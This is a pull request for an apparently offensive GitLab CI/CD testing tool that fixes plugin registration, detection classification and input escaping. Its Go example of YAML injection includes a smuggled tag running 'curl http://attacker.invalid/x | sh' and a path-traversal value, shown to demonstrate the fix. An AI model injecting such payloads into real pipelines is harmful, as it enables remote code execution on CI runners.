Fix GitLab registry, detection classification, and client cleanups #6
Open
praetorian-rang wants to merge 4 commits into main from
Conversation
Add blank imports for runnerexec and secretsdump GitLab attack plugins to pkg/attacks/all/all.go. These plugins were only accessible via direct CLI imports, silently omitting them from the global registry used by the SDK integration in pkg/lib/. Resolves LAB-1455
The permissions (token-exposure) and mrsecrets detections both passed VulnExcessivePermissions to GetVulnerabilityClass instead of their actual vulnerability type. This caused findings to be miscategorized in JSON, SARIF, and HTML output.
- permissions.go: VulnExcessivePermissions → VulnTokenExposure
- mrsecrets.go: VulnExcessivePermissions → VulnMergeRequestSecretsExposure
Resolves LAB-1456

- Use yaml.Marshal for runner tag serialization in runnerexec pipeline generation, preventing YAML injection via metacharacters (matches the pattern already used by secretsdump)
- Add url.PathEscape to ListUserProjects for consistency with GetProject and ListGroupProjects
- Remove duplicate /api/v4 URL normalization from Platform.Init, letting NewClient be the single owner of that logic
- Hoist regexp.MustCompile in stripANSICodes to a package-level var to avoid recompilation on every log line
Resolves LAB-1460
Verify that runner tags containing YAML-special characters (colon, hash, braces, anchors, aliases) are safely serialized via yaml.Marshal without altering document structure. Resolves LAB-1460
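The two client-side hardening points above (quoting runner tags before they are interpolated into generated pipeline YAML, and confining a caller-supplied identifier to one URL path segment with url.PathEscape) as an added, stand-alone Go example. This is not the project's code: the project serializes tags with yaml.Marshal from a YAML library, while this example substitutes a JSON string literal as the quoted scalar (YAML 1.2 treats a JSON string as a valid double-quoted scalar) so it runs with only the standard library, and it uses a deliberately crude line scan (JobKeys) instead of a real YAML parser to show whether a tag added a key. The names SampleTags, BuildPipelineNaive, BuildPipelineSafe, QuoteYAMLScalar, JobKeys and UserProjectsPath, the pipeline template and the host attacker.invalid are all constructed for the example.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/url"
	"strings"
)

// SampleTags is constructed input. The last two entries carry YAML
// metacharacters: a mapping indicator (": ") and an injected newline that
// tries to smuggle a second script: key into the generated job.
var SampleTags = []string{
	"linux",
	"docker: privileged",
	"shell\n  script:\n    - curl http://attacker.invalid/x | sh",
}

// BuildPipelineNaive interpolates each tag into the template as-is. This is
// the pattern the fix removes: a tag containing a newline or mapping
// indicator changes the structure of the document, not just a list value.
func BuildPipelineNaive(tags []string) string {
	var b strings.Builder
	b.WriteString("run:\n  script:\n    - id\n  tags:\n")
	for _, t := range tags {
		fmt.Fprintf(&b, "    - %s\n", t)
	}
	return b.String()
}

// QuoteYAMLScalar renders s as a YAML double-quoted scalar. A JSON string
// literal is a valid YAML 1.2 double-quoted scalar, so encoding/json gives
// correct escaping of quotes, backslashes, newlines and control characters
// without a YAML dependency. (The project itself uses yaml.Marshal, which is
// the right choice when a YAML library is already linked in.)
func QuoteYAMLScalar(s string) string {
	var buf bytes.Buffer
	enc := json.NewEncoder(&buf)
	enc.SetEscapeHTML(false) // & < > are inert inside a quoted scalar; keep them readable
	if err := enc.Encode(s); err != nil {
		panic(err) // unreachable for a plain string
	}
	return strings.TrimSuffix(buf.String(), "\n") // Encode appends a newline
}

// BuildPipelineSafe is the same template with every tag quoted, so a tag can
// only ever become a single list item.
func BuildPipelineSafe(tags []string) string {
	var b strings.Builder
	b.WriteString("run:\n  script:\n    - id\n  tags:\n")
	for _, t := range tags {
		fmt.Fprintf(&b, "    - %s\n", QuoteYAMLScalar(t))
	}
	return b.String()
}

// JobKeys lists the keys at the job's indentation level (exactly two
// spaces). It is a crude stand-in for parsing the YAML; its only purpose is
// to reveal whether a tag managed to add a key to the job.
func JobKeys(doc string) []string {
	var keys []string
	for _, line := range strings.Split(doc, "\n") {
		if strings.HasPrefix(line, "  ") && !strings.HasPrefix(line, "   ") && strings.HasSuffix(line, ":") {
			keys = append(keys, strings.TrimSpace(strings.TrimSuffix(line, ":")))
		}
	}
	return keys
}

// UserProjectsPath builds the GitLab API path for a user's projects with the
// caller-supplied identifier confined to one path segment, the same
// url.PathEscape treatment the PR applies to ListUserProjects. A value such
// as "../groups/x" becomes "..%2Fgroups%2Fx" and cannot reach another route.
func UserProjectsPath(userID string) string {
	return "/api/v4/users/" + url.PathEscape(userID) + "/projects"
}

func main() {
	naive := BuildPipelineNaive(SampleTags)
	fmt.Print("naive:\n", naive)
	fmt.Println("job keys:", JobKeys(naive)) // script appears twice
	safe := BuildPipelineSafe(SampleTags)
	fmt.Print("safe:\n", safe)
	fmt.Println("job keys:", JobKeys(safe)) // script, tags only
	fmt.Println(UserProjectsPath("../groups/x"))
}
```

Run it and compare the two documents: in the naive output the third tag has become a second script: key at job level and "docker: privileged" has become a one-entry mapping inside the tags list, while in the quoted output every tag is a single string item. The JSON-as-YAML trick is only safe for scalars emitted inside an otherwise trusted template; if the whole document is built from untrusted structure, marshal the entire object with a YAML library as the project does.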
Summary
- Register the GitLab attack plugins (runnerexec, secretsdump) in the global registry so they're discoverable via the SDK path in pkg/lib/
- Fix the vulnerability classification of the token-exposure and merge-request-secrets-exposure detections — findings were categorized as "excessive_permissions" instead of "secrets_exposure"
- Use yaml.Marshal for runner tag serialization in runnerexec to prevent YAML injection via metacharacters
- Add url.PathEscape to ListUserProjects for consistency with other client methods
- Deduplicate /api/v4 URL normalization between Platform.Init and NewClient
- Hoist regexp.MustCompile in log parser to a package-level var

Testing
- make test-short

Closes LAB-1455, LAB-1456, LAB-1460